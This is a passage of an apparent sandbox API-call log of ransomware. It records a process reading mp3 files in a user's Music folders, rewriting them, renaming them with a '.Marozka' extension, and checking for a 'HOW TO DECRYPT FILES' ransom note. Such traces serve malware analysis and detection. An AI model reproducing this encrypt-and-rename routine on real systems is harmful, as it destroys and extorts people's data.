lpFindFileData=0x5be89c) returned 1 [0056.993] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0056.994] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0056.994] FindClose (in: hFindFile=0xa7dcc8 | out: hFindFile=0xa7dcc8) returned 1 [0056.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0056.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0056.994] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", lpFilePart=0x0) returned 0x1f [0056.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ac 5y.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.994] GetFileType (hFile=0x2e0) returned 0x1 [0056.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.994] GetFileType (hFile=0x2e0) returned 0x1 [0056.994] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xceed [0056.994] ReadFile (in: hFile=0x2e0, lpBuffer=0x2806f3c, nNumberOfBytesToRead=0xceed, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2806f3c*, lpNumberOfBytesRead=0x5beabc*=0xceed, lpOverlapped=0x0) returned 1 [0056.995] CloseHandle (hObject=0x2e0) returned 1 [0057.125] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0057.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0057.125] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", lpFilePart=0x0) returned 0x1f [0057.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0057.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ac 5y.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.126] GetFileType (hFile=0x2e0) returned 0x1 [0057.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0057.126] GetFileType (hFile=0x2e0) returned 0x1 [0057.127] WriteFile (in: hFile=0x2e0, lpBuffer=0x269bd30*, nNumberOfBytesToWrite=0xcef0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x269bd30*, lpNumberOfBytesWritten=0x5beab0*=0xcef0, lpOverlapped=0x0) returned 1 [0057.128] CloseHandle (hObject=0x2e0) returned 1 [0057.129] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3", lpFilePart=0x0) returned 0x1f [0057.129] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3.Marozka", lpFilePart=0x0) returned 0x27 [0057.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0057.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ac 5y.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd328980, ftCreationTime.dwHighDateTime=0x1d4ce96, ftLastAccessTime.dwLowDateTime=0x3479f750, ftLastAccessTime.dwHighDateTime=0x1d4c5c3, ftLastWriteTime.dwLowDateTime=0xe4c88f7f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xcef0)) returned 1 [0057.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0057.130] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ac 5y.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ac 5Y.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\ac 5y.mp3.marozka")) returned 1 [0057.130] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", lpFilePart=0x0) returned 0x1f [0057.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0057.130] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\essa0.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.130] GetFileType (hFile=0x2e0) returned 0x1 [0057.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0057.130] GetFileType (hFile=0x2e0) returned 0x1 [0057.130] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x18a85 [0057.130] ReadFile (in: hFile=0x2e0, lpBuffer=0x38ac758, nNumberOfBytesToRead=0x18a85, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x38ac758*, lpNumberOfBytesRead=0x5beabc*=0x18a85, lpOverlapped=0x0) returned 1 [0057.131] CloseHandle (hObject=0x2e0) returned 1 [0057.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0057.199] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0057.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", lpFilePart=0x0) returned 0x1f [0057.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0057.199] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\essa0.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.201] GetFileType (hFile=0x2e0) returned 0x1 [0057.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0057.201] GetFileType (hFile=0x2e0) returned 0x1 [0057.201] WriteFile (in: hFile=0x2e0, lpBuffer=0x38f6720*, nNumberOfBytesToWrite=0x18a90, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x38f6720*, lpNumberOfBytesWritten=0x5beab0*=0x18a90, lpOverlapped=0x0) returned 1 [0057.208] CloseHandle (hObject=0x2e0) returned 1 [0057.210] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\esSa0.mp3", lpFilePart=0x0) returned 0x1f [0057.210] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\esSa0.mp3.Marozka", lpFilePart=0x0) returned 0x27 [0057.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0057.210] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\essa0.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd330b690, ftCreationTime.dwHighDateTime=0x1d4c7da, ftLastAccessTime.dwLowDateTime=0x4e16df20, ftLastAccessTime.dwHighDateTime=0x1d4cfe1, ftLastWriteTime.dwLowDateTime=0xe4d47b2b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18a90)) returned 1 [0057.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0057.210] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3" (normalized: "c:\\users\\fd1hvy\\music\\essa0.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\esSa0.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\essa0.mp3.marozka")) returned 1 [0057.211] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", lpFilePart=0x0) returned 0x27 [0057.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0057.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\zr7q1v_tpek2_.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.211] GetFileType (hFile=0x2e0) returned 0x1 [0057.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0057.211] GetFileType (hFile=0x2e0) returned 0x1 [0057.211] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x7b8f [0057.211] ReadFile (in: hFile=0x2e0, lpBuffer=0x262cb60, nNumberOfBytesToRead=0x7b8f, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x262cb60*, lpNumberOfBytesRead=0x5beabc*=0x7b8f, lpOverlapped=0x0) returned 1 [0057.211] CloseHandle (hObject=0x2e0) returned 1 [0057.441] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0057.441] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0057.441] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", lpFilePart=0x0) returned 0x27 [0057.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0057.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\zr7q1v_tpek2_.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.442] GetFileType (hFile=0x2e0) returned 0x1 [0057.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0057.442] GetFileType (hFile=0x2e0) returned 0x1 [0057.442] WriteFile (in: hFile=0x2e0, lpBuffer=0x26a0478*, nNumberOfBytesToWrite=0x7b90, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26a0478*, lpNumberOfBytesWritten=0x5beab0*=0x7b90, lpOverlapped=0x0) returned 1 [0057.443] CloseHandle (hObject=0x2e0) returned 1 [0057.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3", lpFilePart=0x0) returned 0x27 [0057.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3.Marozka", lpFilePart=0x0) returned 0x2f [0057.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0057.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\zr7q1v_tpek2_.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced7cfe0, ftCreationTime.dwHighDateTime=0x1d4d0f2, ftLastAccessTime.dwLowDateTime=0x8563f8b0, ftLastAccessTime.dwHighDateTime=0x1d4cd56, ftLastWriteTime.dwLowDateTime=0xe4f83e8f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x7b90)) returned 1 [0057.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0057.445] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\zr7q1v_tpek2_.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\zR7Q1v_tpEK2_.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\zr7q1v_tpek2_.mp3.marozka")) returned 1 [0057.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0057.446] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB", lpFilePart=0x0) returned 0x1d [0057.446] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db88 [0057.446] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.446] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.446] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.447] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0057.447] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0057.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0057.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0057.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0057.447] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB", lpFilePart=0x0) returned 0x1d [0057.448] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db48 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.448] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.449] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0057.449] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0057.449] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0057.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0057.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0057.449] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", lpFilePart=0x0) returned 0x30 [0057.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0057.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\9mtzmt obvaejo.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.449] GetFileType (hFile=0x2e0) returned 0x1 [0057.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0057.449] GetFileType (hFile=0x2e0) returned 0x1 [0057.449] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x437a [0057.449] ReadFile (in: hFile=0x2e0, lpBuffer=0x26aa148, nNumberOfBytesToRead=0x437a, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x26aa148*, lpNumberOfBytesRead=0x5bea48*=0x437a, lpOverlapped=0x0) returned 1 [0057.450] CloseHandle (hObject=0x2e0) returned 1 [0057.527] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0057.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0057.528] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", lpFilePart=0x0) returned 0x30 [0057.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0057.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\9mtzmt obvaejo.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.529] GetFileType (hFile=0x2e0) returned 0x1 [0057.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0057.529] GetFileType (hFile=0x2e0) returned 0x1 [0057.529] WriteFile (in: hFile=0x2e0, lpBuffer=0x270c0b4*, nNumberOfBytesToWrite=0x4380, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x270c0b4*, lpNumberOfBytesWritten=0x5bea3c*=0x4380, lpOverlapped=0x0) returned 1 [0057.530] CloseHandle (hObject=0x2e0) returned 1 [0057.531] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3", lpFilePart=0x0) returned 0x30 [0057.531] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3.Marozka", lpFilePart=0x0) returned 0x38 [0057.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0057.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\9mtzmt obvaejo.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5260a60, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0x22de7900, ftLastAccessTime.dwHighDateTime=0x1d4ce5e, ftLastWriteTime.dwLowDateTime=0xe5047b4a, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4380)) returned 1 [0057.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0057.531] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\9mtzmt obvaejo.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\9mtZmT obVAejO.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\9mtzmt obvaejo.mp3.marozka")) returned 1 [0057.532] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", lpFilePart=0x0) returned 0x2a [0057.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0057.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\wmwsi3jm.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.532] GetFileType (hFile=0x2e0) returned 0x1 [0057.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0057.532] 